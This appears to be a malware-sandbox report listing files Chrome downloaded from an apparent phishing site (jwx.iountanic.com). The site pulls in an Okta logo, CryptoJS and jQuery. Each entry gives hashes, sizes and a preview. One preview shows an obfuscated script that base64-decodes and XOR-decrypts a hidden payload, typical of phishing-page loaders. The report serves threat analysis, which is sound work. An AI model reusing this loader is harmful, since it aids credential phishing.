                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/90xEDUF5aBUWZf12QcGccbcieyyz80
                                    Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (553)
                                    Category:dropped
                                    Size (bytes):549276
                                    Entropy (8bit):5.688530667062875
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B0878E919A5BCA8858B4C1E59929452F
                                    SHA1:43D32E52807D59D2195D8EF6E33F909D58611E21
                                    SHA-256:04A0C20C086EA1EDC10AB2A9612AFC96AC6BD5A49FA5B310768ABA2AB688718F
                                    SHA-512:1755DC4AAC8F3FFE87864EBCAD7247D3828E8B7DC118288544562D8368C308F2CEA3A118259347EE005F1461F7DD1051E20A22234C644697F25C1DAB64F416CB
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/.var q=function(){return[function(R,P,l,K,r,f,J,F,N){if((N=["Invalid JSON string: ",")",""],R&121)==R&&m.call(this,P),(R-4^4)>=R&&R+8>>2<R)a:{try{F=RE[l][K](f);break a}catch(E){}if(/^\s*$/.test((J=String(f),J))?0:/^[\],:{}\s\u2028\u2029]*$/.test(J.replace(/\\["\\\/bfnrtu]/g,P).replace(/(?:"[^"\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?)[\s\u2028\u2029]*(?=:|,|]|}|$)/g,"]").replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g,N[2])))try{F=eval(r+J+N[1]);break a}catch(E){}throw Error(N[0]+.J);}return F},function(R,P,l,K,r,f,J){if((R+1&(J=[" is not an iterable or ArrayLike","u","Y
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):140136
                                    Entropy (8bit):5.680603870642976
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E12E930A011C10B0033D6E602730487C
                                    SHA1:DF9B5109AB8EADF986EE157FAE08CE93F8F50912
                                    SHA-256:BF9ACDC35398897C566089159BB995314DC62B6FD6584491287D0686EFB0533A
                                    SHA-512:C7575ADFD2C834C82D50F38C1AD480D48CFF86B2480F018FBBE6163B2BB3EAB6F6F18D53A5F1FDA525AD57C7B6EC6A71C5E2A9E81A32F87EE5E7BD82AE027876
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k
                                    Preview:<script>..function WGtwqLOYeG(NFpPAsuMWf, bIyQpVGXlm) {..let WlFuXtSNtQ = '';..NFpPAsuMWf = atob(NFpPAsuMWf);..let uryNDrRxVt = bIyQpVGXlm.length;..for (let i = 0; i < NFpPAsuMWf.length; i++) {.. WlFuXtSNtQ += String.fromCharCode(NFpPAsuMWf.charCodeAt(i) ^ bIyQpVGXlm.charCodeAt(i % uryNDrRxVt));..}..return WlFuXtSNtQ;..}..var yWJcgLceur = WGtwqLOYeG(`TxJ0AXQdIAk8RBtHXSIJRHNlERAeXxAiViceZFsBHREOQz11ETwYAE0+Om4XaVllCgcBWkA6FzoLOkRGG0dEPkRzVnYaCxdWHiRGPBwrAEoQXF1hXTgMPAsdXgAeeBl5VzQQCl1ZQ2wJdVYqGhYaQ0RwOkNZeVlET0BTPF45DXkKFhAOEiZDPQkqQ0tcUFQgGToWOhIBBx1ZIRh9V29XVFxAXy1cLA13EAtdXlkgGSMKe0dYXEBTPF45DWd0blMTEG4LOhorEBQHE0M8VHRbMQ0QA0AKYRguEC0REREdUyFaZh88FxBcQVEgUywBKVcOABxCK1ssGCocF1xXXzlZJRY4HUsFAx56GXpWKxgKF1ZIPhkkEDdXDgARDnIYOhorEBQHDT1EF2lZeUUXEEFZPkNpCisaWVFbRDpHOkN2VgcXXVo9GSoVNgwAFV9RPFJnGjYUSxJZUTYYJRA7CksQQUk+QyZUMwpLRx0BYAZmGisAFAdcHSREZxQwF0oZQBJwC2YKOgsNA0cOQz1pWXlZWABQQidHPVkqCwdOEVg6QzkKY1ZLBERHYFAmFj4VAV1QXyMYOxw6GBQHUFgvGCgJMFcOABEOchg6GisQFAcNPUQXaVl5RQgaXVtuRSwVZFsXB0pc
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):7390
                                    Entropy (8bit):4.02755241095864
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/ij26MOWeerVhuo8kGK6ucdRTRIbXNI1HILXyd1UjipRO78170
                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 105536, version 769.768
                                    Category:downloaded
                                    Size (bytes):105536
                                    Entropy (8bit):7.989150976486913
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:CD2B4095E9CE66CDE642C3502A4022D9
                                    SHA1:A280ECDDDD14695FAD22599301AB03ADFE5224C0
                                    SHA-256:404C746C8F7E3F9B7611A8F23D908C1A32A5C972236B9D89BB68B05D9BF4B905
                                    SHA-512:062782597F37B964A5F285FE8B75AC2CC57E99024FA6C9BF841DC2E7B930CE6CFC12EA5F32D2A6B7301A74FFBB552457A2A82ED9D945E135D8B027F506BF5D77
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2
                                    Preview:wOF2.......@.....................................8.$. .`..P..H....T.. . ..WQg......V?..H.I...U.:1....~..?................s...y..*...Y.KEF.......SQ.R].H.H@.oa.....~?..{&@g6i..a...U...z5...x...<........I........,.".....W.7v.$v...t..F]...X.X[..k..su.O.<.......V./.z..;.\....=y7.....]B.8.$`.Y.3....uTT.0.5..7~1...y~........WU.tWM.m....i@.A.-...l'..!.80!..q.'@h?t..Q.-........._.O.S.t..-.b...>..NE$c..O..AT....w .H.A..yK6..PYQ...c.%......}..i.6..X......:.D{...{...}....@.>P........P|.......Ud.BQ.^%.f.%M.b..R...h.j.PUk.....l....c..".....5Kn....Jc.&..&..."..9.....Q`........m.E...:M......\..yIMdZ]..].I..*...#t.shk.u.. .Ld.]{..&......3.UE.PG.0(..6`....B..7<j]....6....z.......\.$l....6BQ..WU...y?[....Unb.....K}T.........p..Z.t.....u..1..._.h).z..m.=`.....p.........{~...i..r.s........v.m|..c0..f.:..1...l..Y....>.........C..O...Xf.K....I...|...Y..=.e.0...^+.w...2....+L......"..X/.~:_..m/.o..B..4.LJ.'..3....f.N..;-9#..e:.J.a;K.9*.I....T.w=.0.....n.K.t..
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                    Category:downloaded
                                    Size (bytes):28584
                                    Entropy (8bit):7.992563951996154
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/7842F572xWMV0gMefk67Ff01qA3Kst60
                                    Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:0
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                    Category:dropped
                                    Size (bytes):48316
                                    Entropy (8bit):5.6346993394709
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2CA03AD87885AB983541092B87ADB299
                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):10796
                                    Entropy (8bit):7.946024875001343
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                    Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (10017)
                                    Category:downloaded
                                    Size (bytes):10245
                                    Entropy (8bit):5.437589264532084
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240830T173124Z&X-Amz-Expires=300&X-Amz-Signature=f2e0514ebf9f3664de06897da37b6c151a131c395ab9de13f3818e3d45b86597&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:downloaded
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    No static file info